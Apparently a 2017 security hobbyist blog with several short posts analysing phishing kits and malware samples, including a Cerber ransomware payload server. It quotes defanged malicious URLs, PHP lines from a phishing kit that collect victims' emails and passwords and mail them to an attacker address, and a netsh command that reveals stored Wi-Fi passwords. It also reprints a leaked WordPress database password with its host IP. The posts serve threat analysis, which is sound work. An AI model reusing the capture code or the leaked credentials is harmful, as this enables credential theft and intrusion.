Monday, March 20, 2017

Fattura Invoice PDF zip exe that uses eMailExtractor

So I'm still learning at this, but I thought I'd walk through my thought process and see if anybody wanted to explain what I did right or wrong :-) A few days ago there was this link

hxxp://www[.]coccorullo[.]it/fattura/Fattura_49922pdf.zip

When extracted you ended up with

0843d52e1df49221a095fbdd0bc4a2cb Fattura_49922pdf.exe

I believe per google translate that Fattura = Invoice so this was likely part of some Phishing email masquerading as an Invoice.

When I ran strings I saw text that seemed to indicate a different program called emailExtractor



When I ran objdump I saw text that seemed to indicate this file was perhaps originally named eMailExtractor.exe



After a google search I came up with this site hxxps://www[.]maxprog[.]com/site/software/internet-marketing/email-extractor_sheet_us.php



So my thoughts were either a.) This is just the legit software and Virus Total screaming cause it's crap ad-loaded junk or b.) perhaps the attacker just renamed or made it look like legit software in order to throw off security researchers or perhaps c.) something more is going on here, like maybe the attacker modified this eMailExtractor.exe for his evil bidding, and made it so that when the user executes, it will "collect all emails on his computer" and then send them back to the attacker somehow. An email Harvester.

Thoughts?

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2017, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Friday, March 3, 2017

netsh for clear text wifi password

I thought this Dmitry Kulshitsky blog was it was interesting, and the fact you can type the following command

netsh wlan show profile name="MyTestWifi" key=clear

And it displays in clear text the password! (under Security settings -> Key Content)



More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2017, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Tuesday, February 21, 2017

Customs Banned Goods Adobe Phish

Adobe Phish

From: "CUSTOMS SERVICES"

Attachment: BANNED GOODS.html (md5 e1e0e1d1720dbcc536c2f596d76627d9 , Virus Total has 19/55)

Body: PLEASE FIND THE ATTACHED LIST OF NEWLY BANNED GOODS BY THE GOVERNMENT

Open the attachment and see this pretty convincing page (pic below) with nice background that makes it look like you're in Adobe Reader instead of a browser

It contain the following ...

alert .... Document is Highly Secured by Microsoft INC. Requires Email Authentication: Kindly Sign in with your correct email and password to view Document
title ... PDF Online
form method ... POST ... action= hxxp://send.akataali[.]us/pdnew.php




More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2017, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Saturday, February 18, 2017

Phishing Site with Search Engine Detection

Continuing discussing @Techhelplistcom's post a dhl/stripe phish site

hxxp://bitadze[.]ge/wp-includes/

The http.zip file also contained X-x-X.php which appears to be search engine/bot/crawler detection ... in theory returns 404 not found for search engines trying to index the site and 200 success for the victims. The idea probably being that they don't want their pages to show up in search engines, they want them hidden from the internet except for when they send out their links in phishing emails. Probably extends the lifetime and thus success rate of their phishing campaign.

Full code here





More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2017, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Attacker Emailed himself your Phished Credentials

@Techhelplistcom posted a dhl/stripe phish site

hxxp://bitadze[.]ge/wp-includes/

The site was still wide open so you could view the http.zip file and in particular under the stripe phish the tfo.php file which is a good example of visibility behind the scenes to see what an attacker is doing with your phished credentials after you enter your data in and click submit on their malicious site



As you can see the attacker grabs your ip address

$ip = $_SERVER['REMOTE_ADDR'];

What browser you're using

$useragent = $_SERVER['HTTP_USER_AGENT'];

Your email & password

$message .= "EMAIL : ".$_POST['1KDL23']."\n";
$message .= "PASSWORD : ".$_POST['FZ32FEZ2345']."\n";


and sends it to himself

$send="fastpay147@gmail.com";

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2017, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Wordpress Config as homepage

@wavellan posted a spam and phishing url.

hxxp://enerjietudu[.]com/

Interesting if you browse to the homepage you get returned the wp-config.php file



Full contents here

And like every good wp-config.php file it contains information such as

define('DB_NAME', 'enerjik3460');
define('DB_USER', 'enerjik34');
define('DB_PASSWORD', 'energy34');
define('DB_HOST', '94.73.144.196');


And all the encryption deets

define('AUTH_KEY', ...
define('SECURE_AUTH_KEY',
define('LOGGED_IN_KEY',
define('NONCE_KEY',
define('AUTH_SALT',
define('SECURE_AUTH_SALT',
define('LOGGED_IN_SALT',
define('NONCE_SALT', ...


All the comments are in Turkish per google translate.

The bottom has an error showing the full path we are sitting in

Fatal error: Call to undefined function wp() in /home/enerjietudu.com/httpdocs/wp-blog-header.php on line 22

I notice that no matter which page I go to (wp-admin/admin.php, etc.) the wp-config.php contents show and an error is thrown.

If I had to guess I think somebody hacked this wordpress site by finding a vulnerability in the wordpress blog header, they found some vulnerability that outputs the content of a file, and so of course they chose the wp-config.php file, and now it's being displayed in the header of every page you navigate to. Then they used that output to login and take control of the database and then were able to use the database to write files to the www root folder and use it in phishing campaigns.

I don't claim to know everything, I'm just guessing. Anybody want to explain what really happened? Thanks!

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2017, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Thursday, February 16, 2017

Cerber payload generator with different hashes

@MlwrHpstr posted a cerber url

freeflamec[.]top/read.php?f=1.gif

If you go directly to the link it'll download a file



If you run md5sum on the file you'll get a hash



c27b380afa8e88d2eba7c58a97d31be1

If you search that md5 on virus total



Which shows you some interesting details about it





If you run strings you'll see this is no php file, this is no .gif file, this is a windows executable



Something else interesting is that this web server read.php script is setup to only serve certain parameter values. If you try to pass in something like 2.gif instead of 1.gif you get an http 200 but no file.



If you try to leave the f parameter empty, you actually get a file but it's 0 bytes and empty



Thus I would venture to guess there are other parameter values you could pass that may serve up different payloads.

Also if you go to the root of the site they have it redirecting to godaddy.com so this is not a compromised site, it's simply a site setup with malicious purposes to serve certain hidden payloads.



If you type in any random php page name that doesn't exist you'll be able to tell the web server version it's running ( Apache/2.2.15 (CentOS) Server )



Poking around found another page that works (admin.php instead of read.php)



Which delivers a different payload with different hash ( 6ab4bfd0fa555fc570188af13409a669 ) which gives different virus total hits, another EXE





Actually it's interesting, this php file generates random cerber EXEs with different hashes every time you re-load it.



Good example of why signature based tools like AV are dying, because of stuff like this that is probably the same exact payload just slightly modified so that the hash changes every time.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2017, this post cannot be reproduced or retransmitted in any form without reference to the original post.